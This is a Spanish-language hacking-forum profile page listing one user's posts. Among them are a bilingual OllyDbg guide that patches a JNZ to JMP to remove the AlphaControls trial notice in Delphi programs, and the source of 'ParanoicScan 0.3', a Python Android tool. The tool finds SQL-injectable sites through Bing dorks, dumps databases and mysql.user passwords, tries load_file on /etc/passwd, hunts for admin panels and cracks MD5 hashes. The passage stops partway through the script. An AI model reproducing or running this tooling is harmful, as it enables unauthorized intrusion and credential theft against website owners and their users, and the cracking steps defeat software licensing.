parece que ya te respondieron la pregunta.
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#151
Programación General / Re: [Delphi] Crackear componente AlphaControls
14 Febrero 2014, 15:34 PM #152
Programación General / [Delphi] Crackear componente AlphaControls
13 Febrero 2014, 22:18 PM
Hola hice un manual para crackear los programas en delphi en los que usaron el componente alphacontrols , en realidad solo saca la molesta ventana en la que nos dice "gracias por usar alphacontrol" o algo asi pero es la idea xD.
El programa que uso para esto es OLLYDBG.
El video :
[youtube=640,360]http://www.youtube.com/watch?v=yKH6OXm3KMg[/youtube]
El manual en si :
Supongo que eso es todo.
El programa que uso para esto es OLLYDBG.
El video :
[youtube=640,360]http://www.youtube.com/watch?v=yKH6OXm3KMg[/youtube]
El manual en si :
Código [Seleccionar]
-- == Crackear componente AlphaControls de Delphi == --
- En Español -
1 - Click derecho -> Search for -> All referenced text strings
2 - Click derecho -> Search for text "Trial" y seleccionen solo "Entire scope"
- Usen Control + L para seguir buscando
3 - Seleccionen y doble click en "Trial version of the AlphaControls"
4 - Seleccionen el "JNZ" que se encuentra arriba de la linea por defecto , hagan doble click para cambiar el "JNZ" por "JMP"
5 - Seleccionen el "JMP SHORT" recien cambiado , hagan doble click y seleccionen "Copy to executable"
6 - Hagan doble click y seleccionen "Save File"
7 - Guarden el ejecutable con el nombre que quieran
- In English -
1 - Right Click -> Search for -> All referenced text strings
2 - Right Click -> Search for text "Trial" and select only "Entire scope"
- Control + L for next
3 - Select and Double Click in "Trial version of the AlphaControls"
4 - Select "JNZ" and change for "JMP"
5 - Select JMP SHORT , double click and select "Copy to executable"
6 - Double Click and "Save File"
7 - Save the file with any name
-- == The End ? == --
Supongo que eso es todo.
#153
Diseño Gráfico / Problema al guardar en web en PhotoShop
10 Febrero 2014, 17:20 PM
Hola tengo un problema cuando quiero guardar un rectangulo redondeado , cuando guardo normalmente se ve bien pero cuando lo guardo para web arruina los bordes del rectangulo volviendose blancos como la imagen :
lo raro es que siempre lo hago como transparente.
¿ como arreglo esto ?
pd : lo hago en formato gif porque estoy haciendo una animacion.
lo raro es que siempre lo hago como transparente.
¿ como arreglo esto ?
pd : lo hago en formato gif porque estoy haciendo una animacion.
#154
Scripting / [Python-Android] ParanoicScan 0.3
3 Febrero 2014, 14:17 PM
Un simple script en python para android , el script tiene las siguientes funciones :
- Scannea en bing buscando SQLI
- Un completo scanner SQLI
- Buscador de panel de administracion
- Codificador de MD5
- Codificador y Decodificador de Base64 y Hex
- Localizador de IP y sus DNS
- Crackeador de para hashes MD5
- HTTP FingerPrinting
Unas imagenes :
El codigo :Código (perl) [Seleccionar]
#!usr/bin/python
# -*- coding: utf-8 -*-
#################################################################################
#This software is Copyright (c) 2014 by Doddy Hackman.
#
#This is free software, licensed under:
#
# The Artistic License 1.0
#
#The Artistic License
#
#Preamble
#
#The intent of this document is to state the conditions under which a Package
#may be copied, such that the Copyright Holder maintains some semblance of
#artistic control over the development of the package, while giving the users of
#the package the right to use and distribute the Package in a more-or-less
#customary fashion, plus the right to make reasonable modifications.
#
#Definitions:
#
# - "Package" refers to the collection of files distributed by the Copyright
# Holder, and derivatives of that collection of files created through
# textual modification.
# - "Standard Version" refers to such a Package if it has not been modified,
# or has been modified in accordance with the wishes of the Copyright
# Holder.
# - "Copyright Holder" is whoever is named in the copyright or copyrights for
# the package.
# - "You" is you, if you're thinking about copying or distributing this Package.
# - "Reasonable copying fee" is whatever you can justify on the basis of media
# cost, duplication charges, time of people involved, and so on. (You will
# not be required to justify it to the Copyright Holder, but only to the
# computing community at large as a market that must bear the fee.)
# - "Freely Available" means that no fee is charged for the item itself, though
# there may be fees involved in handling the item. It also means that
# recipients of the item may redistribute it under the same conditions they
# received it.
#
#1. You may make and give away verbatim copies of the source form of the
#Standard Version of this Package without restriction, provided that you
#duplicate all of the original copyright notices and associated disclaimers.
#
#2. You may apply bug fixes, portability fixes and other modifications derived
#from the Public Domain or from the Copyright Holder. A Package modified in such
#a way shall still be considered the Standard Version.
#
#3. You may otherwise modify your copy of this Package in any way, provided that
#you insert a prominent notice in each changed file stating how and when you
#changed that file, and provided that you do at least ONE of the following:
#
# a) place your modifications in the Public Domain or otherwise make them
# Freely Available, such as by posting said modifications to Usenet or an
# equivalent medium, or placing the modifications on a major archive site
# such as ftp.uu.net, or by allowing the Copyright Holder to include your
# modifications in the Standard Version of the Package.
#
# b) use the modified Package only within your corporation or organization.
#
# c) rename any non-standard executables so the names do not conflict with
# standard executables, which must also be provided, and provide a separate
# manual page for each non-standard executable that clearly documents how it
# differs from the Standard Version.
#
# d) make other distribution arrangements with the Copyright Holder.
#
#4. You may distribute the programs of this Package in object code or executable
#form, provided that you do at least ONE of the following:
#
# a) distribute a Standard Version of the executables and library files,
# together with instructions (in the manual page or equivalent) on where to
# get the Standard Version.
#
# b) accompany the distribution with the machine-readable source of the Package
# with your modifications.
#
# c) accompany any non-standard executables with their corresponding Standard
# Version executables, giving the non-standard executables non-standard
# names, and clearly documenting the differences in manual pages (or
# equivalent), together with instructions on where to get the Standard
# Version.
#
# d) make other distribution arrangements with the Copyright Holder.
#
#5. You may charge a reasonable copying fee for any distribution of this
#Package. You may charge any fee you choose for support of this Package. You
#may not charge a fee for this Package itself. However, you may distribute this
#Package in aggregate with other (possibly commercial) programs as part of a
#larger (possibly commercial) software distribution provided that you do not
#advertise this Package as a product of your own.
#
#6. The scripts and library files supplied as input to or produced as output
#from the programs of this Package do not automatically fall under the copyright
#of this Package, but belong to whomever generated them, and may be sold
#commercially, and may be aggregated with this Package.
#
#7. C or perl subroutines supplied by you and linked into this Package shall not
#be considered part of this Package.
#
#8. The name of the Copyright Holder may not be used to endorse or promote
#products derived from this software without specific prior written permission.
#
#9. THIS PACKAGE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR IMPLIED
#WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
#MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
#
#The End
#
#################################################################################
#Paranoic Scan 0.3
#Android Version
#(C) Doddy Hackman 2014
#################################################################################
import android,urllib2,socket,binascii,re,base64,hashlib
webvul = ""
# Functions
def hexencoder(texto):
return "[+] Result : "+"0x"+str(binascii.hexlify(texto))
def hexdecoder(texto):
text = re.sub("0x","",texto)
return "[+] Result : "+binascii.unhexlify(text)
def base64encoder(texto):
return "[+] Result : "+base64.b64encode(texto)
def base64decoder(texto):
return "[+] Result : "+base64.b64decode(texto)
def md5encoder(texto):
return "[+] Result : "+hashlib.md5(texto).hexdigest()
def reem(texto,parte):
return re.sub(parte,"hackman",texto)
def regexver(code):
if (re.findall("K0BRA(.*?)K0BRA",code)):
return True
else:
return False
def regexdar(code):
if (re.findall("K0BRA(.*?)K0BRA",code)):
return re.findall("K0BRA(.*?)K0BRA",code)[0]
def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()
def tomar(web,vars) :
nave = urllib2.build_opener()
nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
return nave.open(web,vars).read()
def getdata(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).info()
def bypass(bypass):
if bypass == "--":
return("+","--")
elif bypass == "/*":
return("/**/","/**/")
else:
return("+","--")
def showtables(web):
pass1,pass2 = bypass("--")
respuesta = ""
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
respuesta = respuesta + "[+] Searching tables ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] Tables Found : "+numbers+"\n\n"
for counter in range(17,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
table = re.findall("K0BRA(.*?)K0BRA",code2)
table = table[0]
respuesta = respuesta + "[Table Found] : "+table+"\n"
else:
respuesta = respuesta + "[-] Not Found\n"
respuesta = respuesta + "\n[+] Finished"
return respuesta
def showcolumns(web,tabla):
respuesta = ""
pass1,pass2 = bypass("--")
tabla2 = tabla
tabla = "0x"+str(binascii.hexlify(tabla))
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
respuesta = respuesta + "[+] Searching columns ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] Columns Found : "+numbers+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
column = re.findall("K0BRA(.*?)K0BRA",code2)
column = column[0]
respuesta = respuesta + "\n[Column Found in table "+str(tabla2)+"] : "+str(column)
else:
respuesta = respuesta + "[-] Not Found"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def showdbs(web):
respuesta = ""
pass1,pass2 = bypass("--")
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
respuesta = respuesta + "[+] Searching DBS ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] DBS Found : "+numbers+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
db = re.findall("K0BRA(.*?)K0BRA",code2)
db = db[0]
respuesta = respuesta + "\n[DB Found] : "+db
else:
respuesta = respuesta + "[-] Not Found"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def dumper(web,table,col1,col2):
respuesta = ""
pass1,pass2 = bypass("--")
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
code1 = toma(web1+pass1+"from"+pass1+table+pass2)
respuesta = respuesta + "[+] Searching values ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] Values Found : "+numbers+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
c1 = re.findall("K0BRA(.*?)K0BRA",code2)
c1 = c1[0]
c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
c2 = c2[0]
respuesta = respuesta + "\n["+col1+"] : "+c1+"\n"
respuesta = respuesta + "["+col2+"] : "+c2+"\n"
else:
respuesta = respuesta + "[-] Not Found\n"
respuesta = respuesta + "\n[+] Finished"
return respuesta
def mysqluser(web):
pass1,pass2 = bypass("--")
respuesta = ""
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
respuesta = respuesta + "[+] Searching mysql.user ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] Users Found : "+numbers+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
host = re.findall("K0BRA(.*?)K0BRA",code2)
host = host[0]
user = re.findall("K0BRA1(.*?)K0BRA1",code2)
user = user[0]
passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
passw = passw[0]
respuesta = respuesta + "\n[Host] : "+host
respuesta = respuesta + "\n[User] : "+user
respuesta = respuesta + "\n[Pass] : "+passw+"\n"
else:
respuesta = respuesta + "[-] Not Found\n"
respuesta = respuesta + "\n[+] Finished"
return respuesta
def showcolumnsdb(web,db,table):
respuesta = ""
db2 = db
table2 = table
db = "0x"+str(binascii.hexlify(db))
table = "0x"+str(binascii.hexlify(table))
pass1,pass2 = bypass("--")
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
respuesta = respuesta + "[+] Searching columns in DB ...\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "\n[+] Columns Found : "+str(numbers)+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
column = re.findall("K0BRA(.*?)K0BRA",code2)
column = column[0]
respuesta = respuesta + "\n[Column Found] : "+str(column)
else:
respuesta = respuesta + "\n[-] Not Found"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def showtablesdb(web,db):
respuesta = ""
db2 = db
db = "0x"+str(binascii.hexlify(db))
pass1,pass2 = bypass("--")
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
respuesta = respuesta + "[+] Searching tables in DB ...\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
numbers = re.findall("K0BRA(.*?)K0BRA",code1)
numbers = numbers[0]
respuesta = respuesta + "[+] Tables Found : "+str(numbers)+"\n"
for counter in range(0,int(numbers)):
code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
if (re.findall("K0BRA(.*?)K0BRA",code2)):
table = re.findall("K0BRA(.*?)K0BRA",code2)
table = table[0]
respuesta = respuesta + "\n[Table Found] : "+table
else:
respuesta = respuesta + "[-] Not Found"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def more(web):
respuesta = ""
pass1,pass2 = bypass("--")
otraweb = web
respuesta = respuesta + "[+] Searching DB Details ...\n"
hextest = "0x2f6574632f706173737764"
web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
code0 = toma(web1+pass2)
if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
datar = re.split("K0BRA",datax[0])
respuesta = respuesta + "\n[+] Username : "+datar[1]
respuesta = respuesta + "\n[+] Database : "+datar[2]
respuesta = respuesta + "\n[+] Version : "+datar[3]+"\n"
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
if (re.findall("K0BRA",code1)):
respuesta = respuesta + "\n[+] mysql.user : on"
code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
if (re.findall("K0BRA",code2)):
respuesta = respuesta + "\n[+] information_schema.tables : on"
codetres = toma(web2)
if (re.findall("ERTOR854",codetres)):
respuesta = respuesta + "\n[+] load_file() : on"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def httpfinger(target):
respuesta = ""
try:
respuesta = respuesta + str(getdata(target))
except:
respuesta = respuesta + "[-] Error"
return respuesta
def scanpanel(web):
contador = 0
panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
respuesta = ""
respuesta = respuesta + "[+] Scanning ...\n"
for path in panels:
try:
toma(web+"/"+path)
respuesta = respuesta + "\n[+] Link : "+web+"/"+path
contador = contador + 1
except urllib2.URLError, e:
pass
if(contador==0) :
respuesta = respuesta + "\n[+] Not Found"
respuesta = respuesta + "\n\n[+] Finished"
return respuesta
def crackmd5(md5) :
respuesta = ""
code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
if (re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)):
rex = re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)
return "[+] Hash : "+rex[0][1]
else:
code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
if (re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)):
rex = re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)
return "[+] Hash : "+rex[0]
else:
code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
if (re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)):
rex = re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)
return "[+] Hash : "+rex[0]
else:
return "[+] Hash : Not Found"
return respuesta
def locateip(pagina):
respuesta = ""
ip = socket.gethostbyname(str(pagina))
code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress="+ip)
respuesta = respuesta + "[++] IP Address Location\n"
if (re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
rex = re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
city = rex[0][1]
respuesta = respuesta + "\n[++] City : "+city
else:
respuesta = respuesta + "\n[++] City : Not Found"
if (re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
rex = re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
country = rex[0][1]
respuesta = respuesta + "\n[++] Country : "+country
else:
respuesta = respuesta + "\n[++] Country : Not Found"
if (re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
rex = re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
state = rex[0][1]
respuesta = respuesta + "\n[++] State : "+state
else:
respuesta = respuesta + "\n[++] State : Not Found"
code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
if (re.findall("whois\/(.*?)\">Whois",code)):
rex = re.findall("whois\/(.*?)\">Whois",code)
respuesta = respuesta + "\n\n[++] DNS Founds\n"
for dns in rex:
respuesta = respuesta + "\n[+] "+dns
return respuesta
def sqltest(webs):
respuesta = ""
for web in webs :
if re.findall("=",web):
web = re.split("=",web)
web = web[0]+"="
try:
code = toma(web+"-1+union+select+1--")
if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
respuesta = respuesta + "[SQLI] : "+web+"\n"
except:
pass
return respuesta
def limpiar(pag):
limpia = []
for p in pag:
if p not in limpia:
limpia.append(p)
return limpia
def bingscan(dork,count):
respuesta = ""
pag = []
s = 10
while s <= int(count):
try:
code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
s += 10
for a in d:
pag.append(a)
except:
pass
pag = limpiar(pag)
return pag
##
aplicacion = android.Android()
def menuencoder():
aplicacion.dialogCreateAlert("Encoders")
aplicacion.dialogSetItems(["MD5 Encoder","Base64 Encoder","Base64 Decoder","Hex Encoder","Hex Decoder","Exit"])
aplicacion.dialogShow()
reh = aplicacion.dialogGetResponse().result
reb = reh["item"]
if reb==0:
aplicacion.dialogCreateAlert("MD5 Encoder")
aplicacion.dialogGetInput("MD5 Encoder","Enter Text")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menuencoder()
else:
texto = ref['value']
aplicacion.dialogCreateSpinnerProgress("MD5 Encoder","[+] Encoding ...")
aplicacion.dialogShow()
don = md5encoder(texto)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("MD5 Encoder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menuencoder()
if reb==1 :
aplicacion.dialogCreateAlert("Base64 Encoder")
aplicacion.dialogGetInput("Base64 Encoder","Enter Text")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menuencoder()
else:
texto = ref['value']
aplicacion.dialogCreateSpinnerProgress("Base64 Encoder","[+] Encoding ...")
aplicacion.dialogShow()
don = base64encoder(texto)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("Base64 Encoder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menuencoder()
if reb==2 :
aplicacion.dialogCreateAlert("Base64 Decoder")
aplicacion.dialogGetInput("Base64 Decoder","Enter Text")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menuencoder()
else:
texto = ref['value']
aplicacion.dialogCreateSpinnerProgress("Base64 Decoder","[+] Encoding ...")
aplicacion.dialogShow()
don = base64decoder(texto)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("Base64 Decoder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menuencoder()
if reb==3 :
aplicacion.dialogCreateAlert("Hex Encoder")
aplicacion.dialogGetInput("Hex Encoder","Enter Text")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menuencoder()
else:
texto = ref['value']
aplicacion.dialogCreateSpinnerProgress("Hex Encoder","[+] Encoding ...")
aplicacion.dialogShow()
don = hexencoder(texto)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("Hex Encoder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menuencoder()
if reb==4 :
aplicacion.dialogCreateAlert("Hex Decoder")
aplicacion.dialogGetInput("Hex Decoder","Enter Text")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menuencoder()
else:
texto = ref['value']
aplicacion.dialogCreateSpinnerProgress("Hex Decoder","[+] Encoding ...")
aplicacion.dialogShow()
don = hexdecoder(texto)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("Hex Decoder",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menuencoder()
if reb==5:
menu()
def menusql():
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogSetItems(["Get Tables","Get Columns","Get Databases","Get Tables of DB","Get Columns of DB","Get mysql.users","Get Details DB","Dump Values","Exit"])
aplicacion.dialogShow()
reez = aplicacion.dialogGetResponse().result
opsql = reez["item"]
if opsql==0:
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables ...")
aplicacion.dialogShow()
don = showtables(webvul)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==1 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
ref = aplicacion.dialogGetResponse().result
if not ref['which'] == 'positive' :
menusql()
else:
tabla = ref['value']
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns ...")
aplicacion.dialogShow()
don = showcolumns(webvul,tabla)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==2 :
aplicacion.dialogCreateAlert("SQLI Scanner")
aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Databases ...")
aplicacion.dialogShow()
don = showdbs(webvul)
aplicacion.dialogDismiss()
aplicacion.dialogCreateAlert("SQLI Scanner",don)
aplicacion.dialogSetPositiveButtonText("Done")
aplicacion.dialogShow()
op = aplicacion.dialogGetResponse().result
if op["which"] == "positive" :
menusql()
if opsql==3 :
